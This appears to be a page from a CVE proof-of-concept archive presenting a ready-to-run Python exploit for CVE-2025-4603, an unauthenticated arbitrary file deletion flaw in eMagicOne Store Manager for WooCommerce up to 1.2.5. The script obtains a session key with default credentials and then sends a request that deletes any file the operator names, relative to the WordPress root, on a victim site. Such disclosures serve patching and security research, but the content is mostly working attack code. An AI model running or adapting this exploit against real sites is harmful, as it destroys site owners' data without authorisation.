4837 Total CVEs
26 Years
GitHub
Home / 2025 / CVE-2025-4603
README.md
Rendering markdown...
POC / CVE-2025-4603.py PY
⬇ Raw GitHub ✕ Close 
# Exploit Title: eMagicOne Store Manager for WooCommerce <= 1.2.5 - Unauthenticated Arbitrary File Deletion
# Date: 05/07/2025
# Exploit Author: Ryan Kozak https://ryankozak.com
# Vendor Homepage:  https://emagicone.com
# Version: <= 1.2.5
# Tested on: 1.2.5
# CVE : CVE-2025-4603

import time
import urllib3
import hashlib
import argparse
import requests

def main():
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

    # Parse command line arguments
    parser = argparse.ArgumentParser(description="CVE-2025-4603: eMagicOne Store Manager for WooCommerce <= 1.2.5 - Unauthenticated Arbitrary File Deletion")
    parser.add_argument("victim_url", help="Target url or ip address.")
    parser.add_argument("--username", default="1", help="Username for authentication (default: 1)")
    parser.add_argument("--password", default="1", help="Password for authentication (default: 1)")
    parser.add_argument("--file", required=True, help="Path to file to delete relative to WordPress root")
    args = parser.parse_args()

    hash_val = hashlib.md5((args.username + args.password).encode()).hexdigest()

    session = requests.Session()
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    }

    print("[*] Requesting session key...")
    resp = session.post(
        f"{args.victim_url}/?connector=bridge",
        data={
            "hash": hash_val,
            "task": "get_version"
        },
        headers=headers,
        verify=False
    )
    print("[*] Raw response:", resp.text)
    try:
        session_key = resp.json().get("session_key")
    except Exception:
        print("[-] Failed to parse session key from response:", resp.text)
        exit(1)

    if not session_key:
        print("[-] No session key returned!")
        exit(1)
    print("[+] Got session key:", session_key)
    time.sleep(2)

    delete_url = (
        f"{args.victim_url}/?connector=bridge"
        f"&task=delete_file"
        f"&key={session_key}"
        f"&path={args.file}"
    )

    print("[*] Attempting to delete file...")
    resp = session.post(delete_url, headers=headers, verify=False)
    print("[*] Delete response:", resp.text)

if __name__ == "__main__":
    main()